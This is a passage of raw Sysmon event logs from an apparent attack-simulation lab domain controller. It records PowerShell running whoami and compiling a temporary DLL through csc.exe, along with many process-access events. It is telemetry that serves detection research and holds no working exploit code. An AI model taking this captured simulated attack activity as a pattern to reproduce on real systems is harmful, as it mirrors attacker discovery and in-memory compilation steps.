21:09:48.724{4DB9351A-A31C-60D3-2706-00000000CF01}6500ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\qal2myyi\qal2myyi.dllMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024734Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.724{4DB9351A-A31C-60D3-2706-00000000CF01}6500ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\ADMINI~1\AppData\Local\Temp\RES975C.tmpMD5=368C66C68E9A9A73854413DBD91C3B0A,SHA256=A4CF58E41DA09BF34DD6C7FC1EB7E302BD6A89B0D3CE09E977E6AB6B036665B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024733Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:48.709{4DB9351A-A31C-60D3-2806-00000000CF01}1288ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Users\ADMINI~1\AppData\Local\Temp\RES975C.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024732Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.709{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A31C-60D3-2806-00000000CF01}1288C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024731Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.709{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024730Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:48.709{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024729Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.709{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024728Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:48.709{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024727Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.693{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084872C:\Windows\system32\csrss.exe{4DB9351A-A31C-60D3-2806-00000000CF01}1288C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024726Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:48.693{4DB9351A-A31C-60D3-2706-00000000CF01}65005352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{4DB9351A-A31C-60D3-2806-00000000CF01}1288C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b46d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3db4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3f2c|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+4002|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27b2|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+2804|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+2948|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7fe06|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+4726f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45e1f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45b16|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45826|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1938a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18bf6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+a831|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1f0a49|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024725Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.708{4DB9351A-A31C-60D3-2806-00000000CF01}1288C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 
"/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES975C.tmp" "c:\Users\Administrator\AppData\Local\Temp\qal2myyi\CSC96C2CDA38C574F06AECFADFACA9F7F46.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=C877CBB966EA5939AA2A17B6A5160950,SHA256=1FE531EAC592B480AA4BD16052B909C3431434F17E7AE163D248355558CE43A6,IMPHASH=55D76ADE7FFEA0F41FF2B55505C2B362{4DB9351A-A31C-60D3-2706-00000000CF01}6500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\qal2myyi\qal2myyi.cmdline" 10341000x800000000000000024724Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.630{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A31C-60D3-2706-00000000CF01}6500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024723Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:48.617{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024722Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.617{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024721Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:48.617{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024720Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.617{4DB9351A-9E1D-60D3-8B00-00000000CF01}47086292C:\Windows\system32\csrss.exe{4DB9351A-A31C-60D3-2706-00000000CF01}6500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024719Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:48.617{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024718Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.617{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A31C-60D3-2706-00000000CF01}6500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2be405|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2be05f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2bdb80|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2bdb08|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2bc1c3|C:\Windows\assembly\NativeImages_v4.0.30319_64\Sys
tem\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+7d8e81|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+7d828a|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\c9b7279c68fae45a93cbcb3e18dd69b7\Microsoft.PowerShell.Commands.Utility.ni.dll+ffb6fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\c9b7279c68fae45a93cbcb3e18dd69b7\Microsoft.PowerShell.Commands.Utility.ni.dll+ffb6fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bed14bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982116(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.
dll+9bead93c(wow64) 154100x800000000000000024717Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.628{4DB9351A-A31C-60D3-2706-00000000CF01}6500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.8.3761.0 built by: NET48REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\qal2myyi\qal2myyi.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=23EE3D381CFE3B9F6229483E2CE2F9E1,SHA256=4240A12E0B246C9D69AF1F697488FE7DA1B497DF20F4A6F95135B4D5FE180A57,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000024716Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.617{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\qal2myyi\qal2myyi.cmdline2021-06-23 21:09:48.617 11241100x800000000000000024715Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:09:48.617{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\qal2myyi\qal2myyi.dll2021-06-23 21:09:48.617 10341000x800000000000000024714Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:48.427{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A31C-60D3-2606-00000000CF01}1680C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024713Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.427{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024712Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:48.427{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024711Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.427{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024710Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:48.427{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024709Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.427{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A31C-60D3-2606-00000000CF01}1680C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024708Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:48.427{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A31C-60D3-2606-00000000CF01}1680C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9ca36d54(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.n